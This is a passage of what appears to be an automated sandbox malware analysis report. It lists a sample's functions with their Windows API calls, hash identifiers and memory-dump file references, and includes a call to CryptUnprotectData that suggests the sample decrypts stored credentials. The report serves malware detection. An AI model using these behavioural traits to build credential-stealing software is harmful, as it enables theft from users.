                        • Instruction ID: 7eefdc656ef30e1f8f1aa571929ff8f18f85cc25217d4f41a38b65dba4e63db6
                        • Opcode Fuzzy Hash: 0665eac30637b88fd087c6a6bff9d142405be371555b7fd777c47ade1b5834e8
                        • Instruction Fuzzy Hash: 94B207F360C214AFE3086E2DEC8567BBBE9EFD4620F1A453DEAC5C3744E93558018696
                        Function 009AFCB5 Relevance: 6.6, Strings: 4, Instructions: 1577COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Pou{$_]?{$r2V~$sf^
                        • API String ID: 0-1122797718
                        • Opcode ID: 4457543fcb15f51efa968b99565c830ca7fb74e639c19a2030cc89ea02689e08
                        • Instruction ID: 2f999f2c3a018cde69e20ba7d8ed40fbfa18dee6ff03a18ec1203a312a710ca3
                        • Opcode Fuzzy Hash: 4457543fcb15f51efa968b99565c830ca7fb74e639c19a2030cc89ea02689e08
                        • Instruction Fuzzy Hash: FBB215F360C2009FE704AE29EC8567AF7E5EF94720F16893DEAC583744EA3598058797
                        Function 005F8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptBinaryToStringA.CRYPT32(00000000,005E5184,40000001,00000000,00000000,?,005E5184), ref: 005F8EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: BinaryCryptString
                        • String ID:
                        • API String ID: 80407269-0
                        • Opcode ID: 29d3f3109aea7ecff463767d74a1848fd1810aec21599a4b935023b64aa18649
                        • Instruction ID: d5000802efed863517aaf147620055d57078ff66fde946cb392da8378c00adcf
                        • Opcode Fuzzy Hash: 29d3f3109aea7ecff463767d74a1848fd1810aec21599a4b935023b64aa18649
                        • Instruction Fuzzy Hash: 20111870200209BFDB04CF64D885FBB3BAABF89700F109858FA198B250DB79EC41DB60
                        Function 005F7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0115E5F0,00000000,?,00600E10,00000000,?,00000000,00000000), ref: 005F7A63
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F7A6A
                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0115E5F0,00000000,?,00600E10,00000000,?,00000000,00000000,?), ref: 005F7A7D
                        • wsprintfA.USER32 ref: 005F7AB7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                        • String ID:
                        • API String ID: 3317088062-0
                        • Opcode ID: bc586ce0ba3250c570229b588767e81cf224c481446d4028d956b16d68295f37
                        • Instruction ID: 86df9c1a8a9fa5346c73ef7023fa9b933fb2ecf4022156a54d7ba4929e381f3f
                        • Opcode Fuzzy Hash: bc586ce0ba3250c570229b588767e81cf224c481446d4028d956b16d68295f37
                        • Instruction Fuzzy Hash: B31182B1945218DBEB248F54DC45F6ABB78FB04711F1047A6EA06932C0D7745A41CF51
                        Function 009AAB7F Relevance: 5.3, Strings: 3, Instructions: 1566COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +Pog$CA}$j$y_
                        • API String ID: 0-3843731330
                        • Opcode ID: 52c27b433a39a28c22c53164a1f022b90f101707ecb428ad4475fcc2c39024ca
                        • Instruction ID: 22c7c71d52766b30a18570ac299818acefb41d138bbc36f8ab06a69801cdd322
                        • Opcode Fuzzy Hash: 52c27b433a39a28c22c53164a1f022b90f101707ecb428ad4475fcc2c39024ca
                        • Instruction Fuzzy Hash: A7B203F360C600AFE704AE29EC8567AFBE5EF94720F16893DE6C587344E6355801C697
                        Function 009A2D7F Relevance: 4.7, Strings: 3, Instructions: 945COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: n".$$0~O$:Md
                        • API String ID: 0-636006483
                        • Opcode ID: 8c774b0dc247c9b58a9b429ef0221eae22ee82e7b96866dc9e625912640f45c6
                        • Instruction ID: da83bdbf96797a2502f7e3ea5def32994b665efbbc63288c139ede2abe236d34
                        • Opcode Fuzzy Hash: 8c774b0dc247c9b58a9b429ef0221eae22ee82e7b96866dc9e625912640f45c6
                        • Instruction Fuzzy Hash: 345206F360C2009FE3046E29EC8567AFBE9EF94320F1A493EE6C4C7744E67598458697
                        Function 005F3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                        Download Yara Rule
                        APIs
                        • CoCreateInstance.COMBASE(005FE118,00000000,00000001,005FE108,00000000), ref: 005F3758
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 005F37B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharCreateInstanceMultiWide
                        • String ID:
                        • API String ID: 123533781-0
                        • Opcode ID: e961dd5ff9247f25589f3a670fdfa8b6a7249fb454d390878b8cb5d689ee7660
                        • Instruction ID: 94ed2da8e289fa37d7e8e3be6464966d7458d2536dda03bc735155162d531707
                        • Opcode Fuzzy Hash: e961dd5ff9247f25589f3a670fdfa8b6a7249fb454d390878b8cb5d689ee7660
                        • Instruction Fuzzy Hash: 7841E971A40A1C9FDB24DB58CC95FABB7B5BB48702F4081D8E608A7290E7756E85CF50
                        Function 005E9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005E9B84
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 005E9BA3
                        • LocalFree.KERNEL32(?), ref: 005E9BD3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$AllocCryptDataFreeUnprotect
                        • String ID:
                        • API String ID: 2068576380-0
                        • Opcode ID: d49f4b44cbda0b5295c8ac6011d5bbaeda073382041719b9ef7be189dbe155c2
                        • Instruction ID: b68873e8dac53b14947c574fd8f3e5284496a16eacb6d37711c40779114bdabf
                        • Opcode Fuzzy Hash: d49f4b44cbda0b5295c8ac6011d5bbaeda073382041719b9ef7be189dbe155c2
                        • Instruction Fuzzy Hash: 9F11CCB8A00209DFDB04DF94D985AAE77F9FF88300F104559E915A7350D774AE51CFA1
                        Function 009B312B Relevance: 4.1, Strings: 2, Instructions: 1637COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1X[$w)yX
                        • API String ID: 0-2339031070
                        • Opcode ID: cde7363d10140f75c43665f333db6e8b1a4ec92561dbec3dd397078419b20e4e
                        • Instruction ID: 6ca7697fe89d706a846ec0cbea58045d7f424bb28f771ae19dfbf41f3ac34eaf
                        • Opcode Fuzzy Hash: cde7363d10140f75c43665f333db6e8b1a4ec92561dbec3dd397078419b20e4e
                        • Instruction Fuzzy Hash: 74B206F360C204AFD3046E2DEC8567ABBE9EF98720F1A453DEAC4C7740E67598058697
                        Function 009A7C09 Relevance: 3.6, Strings: 2, Instructions: 1126COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: #Vgk$Z_~
                        • API String ID: 0-4280087612
                        • Opcode ID: 38f5cc7753960fae98d210fc443f0c4f517b56f237d388f4402bba249781d7f4
                        • Instruction ID: 83811266dcbf675a65521714fc7aba2e279b4f8add74fba89f6421c93807a5b6
                        • Opcode Fuzzy Hash: 38f5cc7753960fae98d210fc443f0c4f517b56f237d388f4402bba249781d7f4
                        • Instruction Fuzzy Hash: 4B7209F3A0C2009FE704AE2DEC4567ABBE9EF94720F1A853DE5C5C7744EA3598018697
                        Function 009AEA3B Relevance: 3.4, Strings: 2, Instructions: 905COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: (!}|$VVnF
                        • API String ID: 0-3446932408
                        • Opcode ID: 4b3fc2bb469a8e16a5a5a3234b92e9db46f66a625be91b9c5739f63f308ecede
                        • Instruction ID: e4809a70a0a707191a0758e52c0a86307a407f3e63b2f45903931fc5cdf02923
                        • Opcode Fuzzy Hash: 4b3fc2bb469a8e16a5a5a3234b92e9db46f66a625be91b9c5739f63f308ecede
                        • Instruction Fuzzy Hash: 975227F360C304AFE3046E29EC8567AFBE9EF94720F1A4A3DE6C583744E53658058697
                        Function 00901083 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <fk?$R ]
                        • API String ID: 0-3475807409
                        • Opcode ID: aaaa801b7fca2079a5db830fd268d0cf22fd6510f6233775a435b9654401e0e0
                        • Instruction ID: d2bd321faa9d1d52b0b7e37df5024fd4d8902917adf5e98feb232cf0ea2f65fa
                        • Opcode Fuzzy Hash: aaaa801b7fca2079a5db830fd268d0cf22fd6510f6233775a435b9654401e0e0
                        • Instruction Fuzzy Hash: 7B51E4B3A082105BE3086E2DDC857BAF7E9EF84720F16453DDAC4C7784E935A8448687
                        Function 009CF130 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
